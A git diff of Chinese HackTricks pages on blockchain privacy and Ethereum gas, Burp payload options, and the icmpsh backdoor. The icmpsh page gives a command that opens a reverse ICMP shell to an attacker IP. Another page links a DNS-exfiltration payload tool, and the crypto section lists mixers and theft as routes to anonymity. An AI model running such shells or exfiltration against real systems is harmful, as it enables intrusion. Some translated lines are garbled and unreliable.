攻击者可能向先前使用过的地址发送小额金额,希望接收方在未来交易中将这些金额与其他输入合并,从而将地址关联在一起。
|
||||
|
||||
### 正确的钱包行为
|
||||
钱包应避免使用已经使用过且为空的地址收到的硬币,以防止这种隐私泄漏。
|
||||
|
||||
## **其他区块链分析技术**
|
||||
|
||||
- **确切的支付金额:** 没有找零的交易很可能是同一用户拥有的两个地址之间的交易。
|
||||
- **整数金额:** 交易中的整数金额表明这是一笔付款,而非整数输出很可能是找零。
|
||||
- **钱包指纹识别:** 不同的钱包具有独特的交易创建模式,允许分析人员识别所使用的软件,可能还有找零地址。
|
||||
- **金额和时间相关性:** 披露交易时间或金额可能使交易可追踪。
|
||||
|
||||
## **流量分析**
|
||||
|
||||
通过监视网络流量,攻击者可能将交易或区块与 IP 地址关联起来,危及用户隐私。如果一个实体运行许多比特币节点,尤其是真实,这一点尤为真实,这将增强他们监视交易的能力。
|
||||
|
||||
## 更多
|
||||
有关隐私攻击和防御的全面列表,请访问[比特币维基上的比特币隐私](https://en.bitcoin.it/wiki/Privacy)。
|
||||
|
||||
# 匿名比特币交易
|
||||
|
||||
## 匿名获取比特币的方法
|
||||
|
||||
- **现金交易:** 通过现金获取比特币。
|
||||
- **现金替代品:** 购买礼品卡并在线兑换比特币。
|
||||
- **挖矿:** 通过挖矿赚取比特币是最私密的方法,尤其是在独自进行挖矿时,因为挖矿池可能知道矿工的 IP 地址。[挖矿池信息](https://en.bitcoin.it/wiki/Pooled_mining)
|
||||
- **盗窃:** 理论上,窃取比特币可能是另一种匿名获取比特币的方法,尽管这是非法的,不建议这样做。
|
||||
|
||||
## 混币服务
|
||||
|
||||
用户会**将比特币发送到混币服务**,服务会**发送不同的比特币回给用户**,扣除一定费用。理论上,观察区块链的对手将**无法将**进入和离开的交易**联系起来**。
|
||||
|
||||
然而,用户需要信任混币服务将比特币退还,并且不会保存有关接收和发送资金之间关系的日志。\
|
||||
还可以使用其他服务作为混币服务,例如比特币赌场,您可以在那里发送比特币,稍后取回。
|
||||
通过使用混币服务,用户可以**发送比特币**并收到**不同的比特币作为回报**,这使得追踪原始所有者变得困难。然而,这需要对服务的信任,不要保留日志并确实返还比特币。替代混币选项包括比特币赌场。
|
||||
|
||||
## CoinJoin
|
||||
|
||||
**CoinJoin**将**不同用户的多个交易混合成一个**,以使观察者更难找出**哪个输入与哪个输出相关**。\
|
||||
这提供了新的隐私级别,但是,**某些** **交易**,其中某些输入和输出金额相关或与其他输入和输出非常不同**仍然可以被外部观察者关联**。
|
||||
**CoinJoin**将来自不同用户的多个交易合并为一个交易,使试图将输入与输出匹配的人的过程变得复杂。尽管其有效性,具有独特输入和输出大小的交易仍可能被追踪。
|
||||
|
||||
比特币区块链上可能的CoinJoin交易ID示例为`402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a`和`85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`。
|
||||
可能使用 CoinJoin 的示例交易包括 `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` 和 `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`。
|
||||
|
||||
[**https://coinjoin.io/en**](https://coinjoin.io/en)\
|
||||
**类似于CoinJoin但更好,对于以太坊,您可以使用** [**Tornado Cash**](https://tornado.cash) **(资金来自矿工,因此它只会出现在您的钱包中)。**
|
||||
欲了解更多信息,请访问[CoinJoin](https://coinjoin.io/en)。对于以太坊上类似的服务,请查看[Tornado Cash](https://tornado.cash),该服务使用矿工资金匿名化交易。
|
||||
|
||||
## PayJoin
|
||||
|
||||
在前一节讨论的CoinJoin类型可以通过检查具有相同价值的多个输出来轻松识别。
|
||||
|
||||
PayJoin(也称为支付到终点或P2EP)是两方之间的一种特殊类型的CoinJoin,其中一方支付另一方。然后,交易**没有具有相同价值的多个输出**,因此不会明显显示为具有相同输出的CoinJoin。考虑这个交易:
|
||||
```
|
||||
作为 CoinJoin 的变体,**PayJoin**(或 P2EP)将交易伪装成两个当事方(例如,客户和商家)之间的常规交易,而不具有 CoinJoin 特有的等额输出特征。这使得它极其难以检测,并可能使交易监视实体使用的共同输入所有权启发式失效。
|
||||
```plaintext
|
||||
2 btc --> 3 btc
|
||||
5 btc 4 btc
|
||||
```
|
||||
# 比特币隐私良好实践
|
||||
# 加密货币隐私的最佳实践
|
||||
|
||||
## 钱包同步
|
||||
## **钱包同步技术**
|
||||
|
||||
比特币钱包必须以某种方式获取有关其余额和历史记录的信息。截至2018年底,最实用和私密的现有解决方案是使用**完整节点钱包**(最大程度上保护隐私)和**客户端端区块过滤**(非常好)。
|
||||
为了维护隐私和安全,与区块链同步钱包至关重要。有两种突出的方法:
|
||||
|
||||
- **完整节点:** 完整节点下载包含比特币上发生的每笔[交易](https://en.bitcoin.it/wiki/Transaction)的整个区块链。因此,监视用户的互联网连接的对手将无法了解用户感兴趣的交易或地址。
|
||||
- **客户端端区块过滤:** 客户端端区块过滤通过创建包含每个区块中每笔交易的所有地址的**过滤器**来工作。这些过滤器可以测试一个**元素是否在集合中**;虽然可能存在误报,但不存在漏报。轻量级钱包会**下载**区块链中每个**区块**的所有过滤器,并检查其**自己的地址**是否匹配。包含匹配项的区块将从点对点网络中完整下载,并且这些区块将用于获取钱包的历史记录和当前余额。
|
||||
- **完整节点**:通过下载整个区块链,完整节点确保最大程度的隐私。所有历史交易都存储在本地,使对手无法识别用户感兴趣的交易或地址。
|
||||
- **客户端端区块过滤**:该方法涉及为区块链中的每个区块创建过滤器,允许钱包识别相关交易而不向网络观察者公开特定兴趣。轻量级钱包下载这些过滤器,仅在找到与用户地址匹配的完整区块时才获取完整区块。
|
||||
|
||||
## Tor
|
||||
## **利用 Tor 实现匿名性**
|
||||
|
||||
比特币网络使用点对点网络,这意味着其他节点可以了解您的IP地址。因此,建议您**每次与比特币网络交互时都通过Tor连接**。
|
||||
鉴于比特币在点对点网络上运行,建议使用 Tor 来掩盖您的 IP 地址,在与网络交互时增强隐私。
|
||||
|
||||
## 避免地址重复使用
|
||||
## **防止地址重复使用**
|
||||
|
||||
**地址被多次使用对隐私非常有害,因为它将更多的区块链交易链接在一起,并证明它们是由同一实体创建的**。使用比特币的最私密和安全的方式是向每个付款人发送一个全新的地址。收到的硬币花费后,该地址不应再次使用。此外,在发送比特币时应要求一个全新的比特币地址。所有良好的比特币钱包都有一个用户界面,以防止地址重复使用。
|
||||
为了保护隐私,每次交易都使用新地址至关重要。重复使用地址可能通过将交易与同一实体关联来损害隐私。现代钱包通过设计阻止地址重复使用。
|
||||
|
||||
## 多笔交易
|
||||
## **交易隐私策略**
|
||||
|
||||
用**多笔链上交易**支付某人可以大大降低基于金额的隐私攻击的威力,例如金额相关性和整数金额。例如,如果用户想向某人支付5 BTC,并且不希望5 BTC的价值很容易被搜索到,那么他们可以发送两笔价值分别为2 BTC和3 BTC的交易,总共为5 BTC。
|
||||
- **多笔交易**:将支付拆分为多笔交易可以模糊交易金额,阻止隐私攻击。
|
||||
- **避免找零**:选择不需要找零输出的交易可通过破坏找零检测方法来增强隐私。
|
||||
- **多个找零输出**:如果避免找零不可行,生成多个找零输出仍然可以提高隐私性。
|
||||
|
||||
## 避免找零
|
||||
# **门罗币:匿名的典范**
|
||||
|
||||
避免找零是指仔细选择交易输入和输出,以完全不需要找零输出。**没有找零输出对隐私非常有利**,因为它破坏了找零检测启发式。
|
||||
门罗币满足了数字交易中绝对匿名的需求,为隐私设定了高标准。
|
||||
|
||||
## 多个找零输出
|
||||
# **以太坊:Gas 和交易**
|
||||
|
||||
如果避免找零不可行,则**创建多个找零输出可以提高隐私**。这也会破坏通常假定只有一个找零输出的找零检测启发式。由于此方法使用的区块空间比通常多,因此避免找零更可取。
|
||||
## **理解 Gas**
|
||||
|
||||
# 门罗币
|
||||
Gas 衡量在以太坊上执行操作所需的计算工作量,以 **gwei** 定价。例如,一笔花费 2,310,000 gwei(或 0.00231 ETH)的交易涉及 gas 限制、基本费用和用于激励矿工的小费。用户可以设置最大费用以确保不过度支付,多余部分将退还。
|
||||
|
||||
当门罗币开发时,它试图解决的迫切需求是**完全匿名**,在很大程度上,它填补了这一空白。
|
||||
## **执行交易**
|
||||
|
||||
# 以太坊
|
||||
以太坊中的交易涉及发送方和接收方,可以是用户或智能合约地址。它们需要支付费用并且必须被挖掘。交易中的基本信息包括接收方、发送方的签名、价值、可选数据、gas 限制和费用。值得注意的是,发送方的地址是从签名中推断出来的,因此在交易数据中不需要它。
|
||||
|
||||
## Gas
|
||||
|
||||
Gas指的是衡量以太坊网络上执行特定操作所需的**计算工作量**的单位。Gas是成功进行以太坊**交易**所需的**费用**。
|
||||
|
||||
Gas价格以**gwei**表示,gwei本身是ETH的一个单位 - 每个gwei等于**0.000000001 ETH**(10的-9次方ETH)。例如,您可以说您的gas费用为1 gwei,而不是说您的gas费用为0.000000001 ether。'gwei'这个词本身意味着'吉博-韦',它等于**1,000,000,000 wei**。Wei本身是**ETH的最小单位**。
|
||||
|
||||
要计算交易将花费的gas,请阅读以下示例:
|
||||
|
||||
假设Jordan必须向Taylor支付1 ETH。在交易中,gas限制为21,000单位,基本费用为100 gwei。Jordan还包括10 gwei的小费。
|
||||
|
||||
使用上述公式,我们可以计算为`21,000 * (100 + 10) = 2,310,000 gwei`或0.00231 ETH。
|
||||
|
||||
当Jordan发送资金时,将从Jordan的账户中扣除1.00231 ETH。Taylor将收到1.0000 ETH。矿工将获得0.00021 ETH的小费。基本费用0.0021 ETH被销毁。
|
||||
|
||||
此外,Jordan还可以为交易设置一个最大费用(`maxFeePerGas`)。实际费用与最大费用之间的差额将退还给Jordan,即`refund = max fee - (base fee + priority fee)`。Jordan可以设置一个最大支付交易执行的金额,并在交易执行时不必担心支付超出基本费用的费用。
|
||||
|
||||
由于基本费用是根据对区块空间的需求由网络计算的,因此最后一个参数:maxFeePerGas有助于控制将支付的最大费用。
|
||||
|
||||
## 交易
|
||||
|
||||
请注意,在**以太坊**网络中,交易是在2个地址之间执行的,这些地址可以是**用户或智能合约地址**。\
|
||||
**智能合约**通过**特殊**的**交易**存储在分布式分类账中。
|
||||
|
||||
改变EVM状态的交易需要广播到整个网络。任何节点都可以广播要求在EVM上执行交易;发生这种情况后,**矿工**将**执行**交易并将结果状态更改传播到网络的其余部分。\
|
||||
交易需要**费用**,必须进行挖矿才能变得有效。
|
||||
|
||||
提交的交易包括以下信息:
|
||||
|
||||
- `recipient` – 接收地址(如果是外部拥有的账户,则交易将转移价值。如果是合同账户,则交易将执行合同代码)
|
||||
- `signature` – 发件人的标识符。当发件人的私钥签署交易并确认发件人已授权此交易时,将生成此标识符
|
||||
- `value` – 从发件人转移到接收方的ETH金额(以WEI为单位,是ETH的一个单位)
|
||||
- `data` – 包含任意数据的可选字段
|
||||
- `gasLimit` – 交易可以消耗的最大gas单位数量。gas单位代表计算步骤
|
||||
- `maxPriorityFeePerGas` - 包含为矿工提供的小费的最大gas数量
|
||||
- `maxFeePerGas` - 为交易愿意支付的最大gas数量(包括`baseFeePerGas`和`maxPriorityFeePerGas`)
|
||||
|
||||
请注意,没有任何字段用于原始地址,这是因为这可以从签名中推断出来。
|
||||
这些实践和机制对于任何希望参与加密货币并优先考虑隐私和安全性的人来说都是基础性的。
|
||||
|
||||
## 参考资料
|
||||
|
||||
- [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake)
|
||||
- [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
|
||||
- [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions)
|
||||
- [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/)
|
||||
- [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
|
||||
- [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse)
|
||||
* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake)
|
||||
* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
|
||||
* [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions)
|
||||
* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/)
|
||||
* [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
|
||||
* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse)
|
||||
|
|
|
@ -1,43 +1,45 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客攻击成为英雄</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**以PDF格式下载HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)的github仓库提交PR来**分享您的黑客技巧**。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# 基础载荷
|
||||
# 基本有效载荷
|
||||
|
||||
* **简单列表:** 只包含每行一个条目的列表
|
||||
* **运行时文件:** 运行时读取的列表(不加载到内存中)。支持大型列表。
|
||||
* **大小写修改:** 对字符串列表应用一些更改(不更改,转为小写,转为大写,转为首字母大写其余小写,转为首字母大写其余保持不变)。
|
||||
* **数字:** 使用Z步长或随机生成从X到Y的数字。
|
||||
* **暴力破解器:** 字符集,最小和最大长度。
|
||||
* **简单列表:** 每行包含一个条目的列表
|
||||
* **运行时文件:** 在运行时读取的列表(不加载到内存中)。用于支持大型列表。
|
||||
* **大小写修改:** 对字符串列表应用一些更改(无更改,转为小写,转为大写,转为 Proper 名称 - 首字母大写,其余小写 -,转为 Proper 名称 - 首字母大写,其余保持不变 -。
|
||||
* **数字:** 使用 Z 步长从 X 到 Y 生成数字或随机生成。
|
||||
* **暴力破解器:** 字符集,最小和最大长度。
|
||||
|
||||
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : 通过DNS请求到burpcollab执行命令并获取输出的载荷。
|
||||
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : 通过 DNS 请求执行命令并获取输出的有效载荷到 burpcollab。
|
||||
|
||||
{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
|
||||
|
||||
[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客攻击成为英雄</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**以PDF格式下载HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)的github仓库提交PR来**分享您的黑客技巧**。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
35
c2/icmpsh.md
35
c2/icmpsh.md
|
@ -1,17 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家,使用</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
|
||||
{% endhint %}
|
||||
|
||||
从以下链接下载后门:[https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
|
||||
|
||||
|
@ -35,16 +35,17 @@ read IP
|
|||
```bash
|
||||
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品,称为[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,283 +1,152 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 基本概念
|
||||
|
||||
# 基本术语
|
||||
- **智能合约**被定义为在区块链上执行的程序,当满足特定条件时自动执行协议,无需中介。
|
||||
- **去中心化应用程序 (dApps)** 建立在智能合约之上,具有用户友好的前端和透明、可审计的后端。
|
||||
- **代币和加密货币** 区分为代币作为数字货币,而代币代表特定情境中的价值或所有权。
|
||||
- **实用代币** 授予访问服务的权限,而 **安全代币** 表示资产所有权。
|
||||
- **DeFi** 代表去中心化金融,提供无需中央机构的金融服务。
|
||||
- **DEX** 和 **DAOs** 分别指去中心化交易平台和去中心化自治组织。
|
||||
|
||||
* **智能合约**:智能合约简单地说就是**存储在区块链上的程序**,当满足预定条件时运行。它们通常用于自动化**协议的执行**,以便所有参与者可以立即确定结果,无需任何中介的参与或时间损失。(来源:[这里](https://www.ibm.com/topics/smart-contracts))。
|
||||
* 基本上,智能合约是一段**代码**,当人们访问并接受合约时将被执行。智能合约**在区块链上运行**(因此结果被存储为不可变),人们可以在接受之前阅读它们。
|
||||
* **dApps**:**去中心化应用程序**是在**智能合约**之上实现的。它们通常具有用户可以与应用程序交互的前端,**后端**是公开的(因此可以进行审计)并且实现为**智能合约**。有时需要使用数据库,以太坊区块链为每个帐户分配一定的存储空间。
|
||||
* **代币和硬币**:**硬币**是一种作为**数字货币**的加密货币,而**代币**是代表一些**价值**但不是硬币的东西。
|
||||
* **实用性代币**:这些代币允许用户**稍后访问某些服务**(在特定环境中具有某些价值)。
|
||||
* **安全性代币**:这些代表**所有权**或某些资产。
|
||||
* **DeFi**:**去中心化金融**。
|
||||
* **DEX:去中心化交易平台**。
|
||||
* **DAOs**:**去中心化自治组织**。
|
||||
## 共识机制
|
||||
|
||||
# 共识机制
|
||||
共识机制确保在区块链上进行安全且达成一致的交易验证:
|
||||
- **工作量证明 (PoW)** 依赖计算能力进行交易验证。
|
||||
- **权益证明 (PoS)** 要求验证者持有一定数量的代币,相较于 PoW 减少能源消耗。
|
||||
|
||||
要使区块链交易得到承认,必须将其**附加**到**区块链**上。验证者(矿工)执行此附加操作;在大多数协议中,他们**为此获得奖励**。为了保持区块链的安全性,必须有一种机制来**防止恶意用户或组织接管大多数验证**。
|
||||
## 比特币基础知识
|
||||
|
||||
工作量证明,另一种常用的共识机制,使用计算能力的验证来验证交易,要求潜在攻击者获取验证者网络大部分计算能力的大部分。
|
||||
### 交易
|
||||
|
||||
## 工作量证明(PoW)
|
||||
比特币交易涉及在地址之间转移资金。交易通过数字签名验证,确保只有私钥的所有者可以发起转账。
|
||||
|
||||
这使用**计算能力验证**来验证交易,要求潜在攻击者获取验证者网络大部分计算能力的大部分。\
|
||||
**矿工**将**选择几笔交易**,然后开始**计算工作量证明**。**具有最大计算资源的矿工**更有可能**更早完成**工作量证明并获得所有交易的费用。
|
||||
#### 关键组件:
|
||||
|
||||
## 权益证明(PoS)
|
||||
- **多重签名交易** 需要多个签名来授权交易。
|
||||
- 交易包括 **输入** (资金来源)、**输出** (目的地)、**费用** (支付给矿工) 和 **脚本** (交易规则)。
|
||||
|
||||
PoS通过**要求验证者拥有一定数量的区块链代币**来实现这一点,要求**潜在攻击者获取区块链上大部分代币**以发动攻击。\
|
||||
在这种共识机制中,矿工拥有的代币越多,矿工被要求创建下一个区块的可能性就越大。\
|
||||
与PoW相比,这大大**减少了矿工消耗的能量**。
|
||||
### 闪电网络
|
||||
|
||||
# 比特币
|
||||
旨在通过允许通道内的多个交易,仅向区块链广播最终状态来增强比特币的可扩展性。
|
||||
|
||||
## 交易
|
||||
## 比特币隐私问题
|
||||
|
||||
简单的**交易**是从一个地址向另一个地址的**资金转移**。\
|
||||
在比特币中,一个**地址**是**公钥**的哈希值,因此,为了从地址进行交易,某人需要知道与该公钥(地址)关联的私钥。\
|
||||
然后,当执行**交易**时,它会使用地址的私钥进行**签名**,以显示交易的**合法性**。
|
